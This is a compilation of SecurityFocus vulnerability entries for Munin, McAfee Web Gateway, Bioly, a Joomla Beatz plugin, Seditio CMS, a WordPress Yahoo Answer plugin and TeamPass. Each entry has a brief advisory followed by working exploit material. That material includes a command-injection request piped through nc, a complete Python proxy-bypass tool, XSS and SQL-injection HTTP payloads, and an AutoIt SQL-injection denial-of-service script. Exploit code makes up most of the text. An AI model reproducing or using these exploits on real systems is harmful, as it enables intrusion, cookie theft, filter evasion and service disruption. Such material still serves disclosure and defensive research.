source: http://www.securityfocus.com/bid/53032/info

Munin is prone to a remote command-injection vulnerability.

Attackers can exploit this issue to inject and execute arbitrary commands in the context of the application.

printf 'GET /cgi-bin/munin-cgi-graph/%%0afoo%%0a/x/x-x.png HTTP/1.0\r\nHost: localhost\r\nConnection: close\r\n\r\n' | nc localhost 80

source: http://www.securityfocus.com/bid/53015/info

McAfee Web Gateway is prone to a security-bypass vulnerability because it fails to properly enforce filtering rules.

A successful attack will allow an attacker to bypass intended security restrictions; this may aid in other attacks.

McAfee Web Gateway 7 is vulnerable; other versions may also be affected.

import socket,struct,sys,time

from threading import Thread

timeOut = 0.8

isGet = 0

hostNameG = ""

pacoteGet = ""

port = 8080 #Listening port

proxyAddr = "vulnerableProxy.com" #vulnerable proxy

proxyPort = 8080 # proxy port

def handle(client,globalSock):

client.settimeout(timeOut)

global hostNameG

while 1:

dados = ""

tam = 0

while 1:

try:

dados2 = client.recv(1024)

tam = tam + len(dados2)

dados = dados + dados2

except socket.timeout:

break

dd = dados.find("CONNECT") #if the packet is a CONNECT METHOD

if dd != -1:

dd2 = dados.find(":")

hostName = dados[dd+8:dd2]

ipAddr = socket.gethostbyname(hostName) #changing the method to connect to the ip address, not the dns domain

pacote = dados

hostHeader = "Host: " + hostName

pacote = pacote.replace(hostHeader, "Host: www.uol.com.br") #changing the host field with a value that is accepted by the proxy

pacote = pacote.replace(hostName, ipAddr) #changind domain for ip

dados = pacote

getd = dados.find("GET ")

getd2 = dados.find("//")

getd3 = dados.find("/", getd2+2)

hostName = dados[getd2+2:getd3]

if getd != -1:

globalSock.close()

globalSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

globalSock.connect((proxyAddr,proxyPort))

globalSock.settimeout(timeOut)

getd2 = dados.find("//")

getd3 = dados.find("/", getd2+2)

hostName = dados[getd2+2:getd3]

proxyAuth = ""

proxyAuthN = dados.find("Proxy-Authorization:")

if proxyAuthN != -1:

proxyAuthNN = dados.find("\r\n", proxyAuthN)

proxyAuth = dados[proxyAuthN:proxyAuthNN]

ipAddr = socket.gethostbyname(hostName)

info = "CONNECT " + ipAddr + ":80 HTTP/1.1\r\n"

if proxyAuthN != -1:

info += proxyAuth + "\r\n"

info += "Host: www.uol.com.br\r\n\r\n"

globalSock.send(info)

tam = 0

gdata = ""

while 1:

try:

gdata2 = globalSock.recv(1024)

tam = tam + len(gdata2)

gdata = gdata + gdata2

if len(gdata2) == 0:

break

except socket.timeout:

break

globalSock.send(dados)

tam = 0

gdata = ""

while 1:

try:

gdata2 = globalSock.recv(1024)

if len(gdata2) > 0:

client.send(gdata2)

tam = tam + len(gdata2)

gdata = gdata + gdata2

if len(gdata2) == 0:

break

except socket.timeout:

break

print 'Proxy Bypass'

print 'by Gabriel Menezes Nunes'

print 'Tested on McAfee Web Gateway 7 and Squid Proxy'

sockzao = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

print 'Attacked Proxy:',

print proxyAddr

print 'Listening on',

print port

sockzao.bind(("",port))

sockzao.listen(6)

while 1:

print 'Waiting for connections'

client, address = sockzao.accept()

print 'Client Connected'

print address

globalSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

globalSock.connect((proxyAddr,proxyPort))

globalSock.settimeout(timeOut)

t = Thread(target=handle, args=(client,globalSock,))

t.start()

source: http://www.securityfocus.com/bid/53018/info

Bioly is prone to multiple SQL-injection and cross-site scripting vulnerabilities.

Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Bioly 1.3 is vulnerable; other versions may also be affected.

Cross Site Scripting

POST /index.php?action=3 HTTP/1.1

Accept: */*

Content-Type: application/x-www-form-urlencoded

User-Agent: STORED XSS TEST

Host: localhost

Content-Length: 68

Connection: Close

Pragma: no-cache

# [Post Data:]==>

email=>"><ScRiPt%20%0a%0d>alert(421135893768)%3B</ScRiPt>&register=1

SQL Injection

POST /index.php?action=11 HTTP/1.1

Accept: */*

Content-Type: application/x-www-form-urlencoded

User-Agent: Sql Injection

Host: localhost

Content-Length: 68

Connection: Close

Pragma: no-cache

# [Post Data:]==>

q=%00'

source: http://www.securityfocus.com/bid/53030/info

Joomla! Beatz Plugin is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker could leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This could allow the attacker to steal cookie-based authentication credentials and launch other attacks.

http://www.example.com/beatz/?option=com_content&view=frontpage&limitstart=5&%2522%253e%253c%2573%2563%2572%2569%2570%2574%253e%2561%256c%2565%2572%2574%2528%2f%2558%2553%2553%2f%2529%253c%2f%2573%2563%2572%2569%2570%2574%253e=1

http://www.example.com/beatz/index.php?option=com_charts&view=charts&Itemid=76&chartkeyword=Acoustic&do=all%22%20style%3dbackground-image:url('javascript:alert(/XSS/)');width:1000px;height:1000px;display:block;"%20x=%22&option=com_charts

http://www.example.com/beatz/index.php?do=listAll&keyword=++Search";><img+src=0+onerror=prompt(/XSS/)>&option=com_find

http://www.example.com/beatz/index.php?option=com_videos&view=videos&Itemid=59&video_keyword="+style="width:1000px;height:1000px;position:absolute;left:0;top:0"+onmouseover="alert(/xss/)&search=Search

source: http://www.securityfocus.com/bid/53036/info

Seditio CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Seditio CMS 165 is vulnerable; prior versions may also be affected.

$exploit=$targetsite & "/plug.php?e=akastep',rd_location=(benchmark(unix_timestamp(now()),sha1(md5(now())))),rd_ip='" & @IPAddress1 & "',rd_lastseen='"; //Our exploit.

$first=$targetsite & '/forums.php'; // our 1'st request will go here.

HttpSetUserAgent("I'm Denial Of Service Exploit for Seditio 165 throught sql injection"); //setting user agent 4 fun

InetGet($first,'',1);// first request.After this our IP address will be inserted to table sed_redirecter.It is neccessary to exploit.

Sleep(1500); //sleeping 1.5 second (*Waiting operation*)

HttpSetUserAgent("Exploiting!!!!");//setting our user agent again 4 fun.

InetGet($exploit,'',1,1) ; Now exploiting it with *do not wait* responce option.Until now We exploiting sql injection and causing Denial Of Service.

Exit; //exit from exploit

source: http://www.securityfocus.com/bid/53037/info

Yahoo Answer plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

http://www.example.com/[]/[]/process-imported-question.php?catname=[xss]

http://www.example.com/[]/[]/editautopilot.php?query=[xss]

source: http://www.securityfocus.com/bid/53038/info

TeamPass is prone to an HTML-injection vulnerability because it fails to sanitize user-supplied input.

Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and control how the site is rendered to the user; other attacks are also possible.

TeamPass 2.1.5 is vulnerable; other versions may also be affected.

POST /TeamPass/sources/users.queries.php HTTP/1.1

type=add_new_user&login=[XSS]&pw=testing2&email=test&admin=false&manager=true&read_only=false&personal_folder=false&new_folder_role_domain=false&domain=test&key=key